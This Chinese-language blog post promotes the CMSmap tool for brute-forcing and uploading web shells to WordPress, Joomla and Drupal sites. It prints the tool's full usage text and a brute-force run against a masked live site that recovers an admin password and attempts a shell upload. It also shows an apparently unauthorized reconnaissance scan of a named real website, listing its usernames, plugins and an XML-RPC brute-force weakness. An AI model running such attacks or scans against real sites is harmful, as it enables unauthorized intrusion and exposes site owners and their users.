关于CMSmap的介绍我就不多说了,反正我告诉你可以直接对 WordPress, Joomla 以及 Drupal.一键getshell。
下载并使用
➜ soft git clone https://github.com/Dionach/CMSmap.git ➜ CMSmap git:(master) python cmsmap.py CMSmap tool v0.6 - Simple CMS Scanner Author: Mike Manzotti [email protected] Usage: cmsmap.py -t <URL> Targets: -t, --target target URL (e.g. 'https://example.com:8080/') -f, --force force scan (W)ordpress, (J)oomla or (D)rupal -F, --fullscan full scan using large plugin lists. False positives and slow! -a, --agent set custom user-agent -T, --threads number of threads (Default: 5) -i, --input scan multiple targets listed in a given text file -o, --output save output in a file --noedb enumerate plugins without searching exploits Brute-Force: -u, --usr username or file -p, --psw password or file --noxmlrpc brute forcing WordPress without XML-RPC Post Exploitation: -k, --crack password hashes file (Require hashcat installed. For WordPress and Joomla only) -w, --wordlist wordlist file Others: -v, --verbose verbose mode (Default: false) -U, --update (C)MSmap, (W)ordpress plugins and themes, (J)oomla components, (D)rupal modules, (A)ll -h, --help show this help Examples: cmsmap.py -t https://example.com cmsmap.py -t https://example.com -f W -F --noedb cmsmap.py -t https://example.com -i targets.txt -o output.txt cmsmap.py -t https://example.com -u admin -p passwords.txt cmsmap.py -k hashes.txt -w passwords.txt
从上面的使用说明可以看出来,这是可以支持多线程暴力破解的。
实践一下
为了保护隐私,我还是打个马赛克吧
➜ CMSmap git:(master) ✗ python cmsmap.py -t http://www.****.org/ -u admin -p pass.txt [-] Date & Time: 15/06/2015 22:36:24 [-] Wordpress Brute Forcing Attack Started [H] Valid Credentials: admin qwerasdf [H] Valid credentials: admin qwerasdf . Do you want to try uploading a shell? [-] (If you are not admin, you won't be able to) [y/N]: y [-] Logging in to the target website as admin:qwerasdf [ERROR] Unable to upload a shell. Probably you are not an admin. [-] Date & Time: 15/06/2015 22:38:59 [-] Completed in: 0:02:35
可以看到这个case是可以爆破,但是不能getshell,因为不是管理员权限的账号。
指纹识别扫描
➜ CMSmap git:(master) ✗ python cmsmap.py -t http://www.jobbole.com/ -f W [-] Date & Time: 15/06/2015 22:58:30 [-] Target: http://www.jobbole.com [M] Website Not in HTTPS: http://www.jobbole.com [I] Server: nginx [I] X-Powered-By: PHP/5.3.3 [L] X-Frame-Options: Not Enforced [I] Strict-Transport-Security: Not Enforced [I] X-Content-Security-Policy: Not Enforced [I] X-Content-Type-Options: Not Enforced [L] Robots.txt Found: http://www.jobbole.com/robots.txt [I] CMS Detection: Wordpress [I] Wordpress Theme: jobboleblogv3 [-] Enumerating Wordpress Usernames via "Feed" ... [-] Enumerating Wordpress Usernames via "Author" ... [M] 10 [M] 11 [M] 12 [M] 13 [M] 14 [M] 16 [M] 17 [M] 18 [M] 19 [M] 4 [M] 9 [M] Carey [M] HelloKitty [M] Spokesman [M] admin [M] jobbole [M] Website vulnerable to XML-RPC Brute Force Vulnerability [I] Autocomplete Off Not Found: http://www.jobbole.com/wp-login.php [-] Default WordPress Files: [I] http://www.jobbole.com/readme.html [I] http://www.jobbole.com/license.txt [I] http://www.jobbole.com/xmlrpc.php [I] http://www.jobbole.com/wp-includes/images/crystal/license.txt [I] http://www.jobbole.com/wp-includes/images/crystal/license.txt [I] http://www.jobbole.com/wp-includes/js/plupload/license.txt [I] http://www.jobbole.com/wp-includes/js/plupload/changelog.txt [I] http://www.jobbole.com/wp-includes/js/tinymce/license.txt [I] http://www.jobbole.com/wp-includes/js/tinymce/plugins/spellchecker/changelog.txt [I] http://www.jobbole.com/wp-includes/js/swfupload/license.txt [-] Searching Wordpress Plugins ... [I] jobbole-wp-plugin [I] mu-widgets [I] q2w3-fixed-widget [I] wp-connect [I] wp-postviews [I] akismet [I] bbpress [I] comment-rating [I] login-lockdown [I] ucan-post [-] Searching Wordpress TimThumbs ... 6%
我感觉这个直接秒杀wpscan啊,非常的强大
来源 http://www.codefrom.com/paper/%E7%A7%92%E6%9D%80wpscan%EF%BC%81wordpress%E4%B8%80%E9%94%AEgetshell
git下载
https://github.com/BrianHeeseIs/CMSmap
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论